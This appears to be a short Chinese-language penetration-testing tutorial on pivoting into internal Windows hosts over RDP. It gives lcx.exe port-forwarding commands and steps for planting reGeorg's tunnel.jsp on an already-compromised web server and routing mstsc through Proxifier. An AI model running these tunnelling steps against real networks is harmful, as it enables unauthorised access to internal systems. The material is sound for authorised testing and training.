遇到內網windows機器,如果想遠程登陸,通常得通過代理,常用的nc、lcx 工具可滿足要求。
如 lcx 示例:
- 兩台機器上均上傳lcx.exe
- 在 xp機器(公網)上執行 lcx.exe -listen 51 33891
- 在 03機器(內網)上執行 lcx.exe -slave 192.168.100.16 51 192.168.32.137 3389
- 在 xp機器(公網)上 mstsc 127.0.0.1:33891 連接
這里講下 reGeorg 的多種搭配使用。
reGeorg+proxifier
測試前提是目標服務器已經getshell。
1.將 reGeorgSocksProxy 中的 tunnel.jsp 文件放置到目標服務器web目錄,查看能否正常訪問(如圖)。
2.配置好后通過 reGeory 來打通本地和目標的通道(如圖顯示成功連接)
3.配置proxifier
打開proxifier,選擇Profile -> Proxy Server -> add
選擇Profile -> Proxification Rules
配置好之后,點擊屏幕左下角的開始菜單,輸入mstsc,會出現mstsc,右鍵它,並選擇Proxifier ->Proxy Socks5 127.0.0.1,然后登陸目標內網ip。
